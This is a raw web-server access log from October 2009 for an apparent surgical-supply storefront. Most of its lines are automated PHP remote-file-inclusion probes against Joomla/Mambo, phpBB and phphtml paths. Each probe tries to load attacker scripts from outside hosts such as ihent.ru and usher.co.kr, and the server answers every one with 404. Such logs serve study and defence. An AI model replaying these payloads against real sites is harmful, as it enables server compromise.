76.124.28.60 - - [13/Oct/2009:01:48:57 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15C9F20034E800E+M37+ENG HTTP/1.1" 200 38454 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
72.11.145.8 - - [13/Oct/2009:01:49:03 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:01:49:15 -0400] "GET //phphtml.php?htmlclass_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:01:49:15 -0400] "GET /logs//phphtml.php?htmlclass_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:01:49:15 -0400] "GET /logs/access_log.Q109052300//phphtml.php?htmlclass_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:01:49:20 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
174.143.3.188 - - [13/Oct/2009:01:49:20 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
174.143.3.188 - - [13/Oct/2009:01:49:21 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.143.3.188 - - [13/Oct/2009:01:49:21 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
72.30.78.234 - - [13/Oct/2009:01:50:08 -0400] "GET /logs/access_log.Q109081200 HTTP/1.0" 200 4716643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
76.124.28.60 - - [13/Oct/2009:01:51:04 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15C9F20034E800E+M37+ENG HTTP/1.1" 200 68066 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:51:06 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15C9F20034E800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:51:06 -0400] "GET /images/fav_a-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15C9F20034E800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:51:06 -0400] "GET /images/addtocart.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15C9F20034E800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:51:06 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15C9F20034E800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:51:06 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15C9F20034E800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
209.59.12.99 - - [13/Oct/2009:01:52:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.127.253.244 - - [13/Oct/2009:01:52:25 -0400] "GET /logs/access_log.Q109052300%20%20//phphtml.php?htmlclass_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:01:52:42 -0400] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:01:52:42 -0400] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:01:52:43 -0400] "GET /logs/access_log.Q109063000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:01:52:43 -0400] "GET /logs/access_log.Q109071900//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
76.124.28.60 - - [13/Oct/2009:01:53:31 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15C9F20034E800E+M37+ENG HTTP/1.1" 200 38454 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:53:45 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15C9F20034E800E+M37+ENG HTTP/1.1" 200 71403 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:53:46 -0400] "GET /images/items/SUTURE_CHROMIC_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15C9F20034E800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:53:46 -0400] "GET /images/fav_r-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C604B15C9F20034E800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
83.103.72.130 - - [13/Oct/2009:01:55:36 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ihent.ru//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:55:36 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ihent.ru//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:55:36 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ihent.ru//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:55:36 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:55:36 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ihent.ru//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:55:36 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:55:51 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:55:51 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:55:51 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:55:59 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ihent.ru//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:55:59 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:02 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://ihent.ru//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:08 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:08 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:08 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:15 -0400] "GET /logs/access_log.Q109083000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:16 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:17 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:21 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:21 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:22 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:22 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:22 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:24 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:24 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:27 -0400] "GET /logs/access_log.Q109083000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:34 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:34 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:34 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:38 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:38 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:38 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:40 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:40 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:40 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:42 -0400] "GET /logs/access_log.Q109083000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.9.31.26 - - [13/Oct/2009:01:56:43 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; CIBA)"
121.9.31.26 - - [13/Oct/2009:01:56:43 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; CIBA)"
72.11.145.8 - - [13/Oct/2009:01:56:43 -0400] "GET /logs/access_log.Q109083000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:45 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:45 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:45 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:45 -0400] "GET /logs/access_log.Q109083000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:47 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.9.31.26 - - [13/Oct/2009:01:56:47 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; CIBA)"
121.9.31.26 - - [13/Oct/2009:01:56:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; CIBA)"
83.103.72.130 - - [13/Oct/2009:01:56:47 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:47 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:49 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:51 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:52 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:53 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:53 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:53 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:56:55 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:56:59 -0400] "GET /logs/access_log.Q109083000%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:57:00 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:57:01 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:57:01 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:57:01 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:57:06 -0400] "GET /logs/access_log.Q109083000%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:01:57:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.143.29.189 - - [13/Oct/2009:01:57:11 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
221.143.29.189 - - [13/Oct/2009:01:57:11 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
221.143.29.189 - - [13/Oct/2009:01:57:11 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:57:14 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
221.143.29.189 - - [13/Oct/2009:01:57:18 -0400] "GET /logs/error_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
221.143.29.189 - - [13/Oct/2009:01:57:31 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
221.143.29.189 - - [13/Oct/2009:01:57:31 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
221.143.29.189 - - [13/Oct/2009:01:57:31 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:01:57:33 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:01:57:33 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
221.143.29.189 - - [13/Oct/2009:01:57:36 -0400] "GET /logs/access_log.Q109063000%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:01:57:37 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:01:57:37 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:01:57:40 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:01:57:49 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:01:57:52 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:57:54 -0400] "GET /logs/access_log.Q109083000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [13/Oct/2009:01:57:54 -0400] "GET /logs/access_log.Q109083000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ihent.ru//id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:01:57:57 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:01:57:57 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
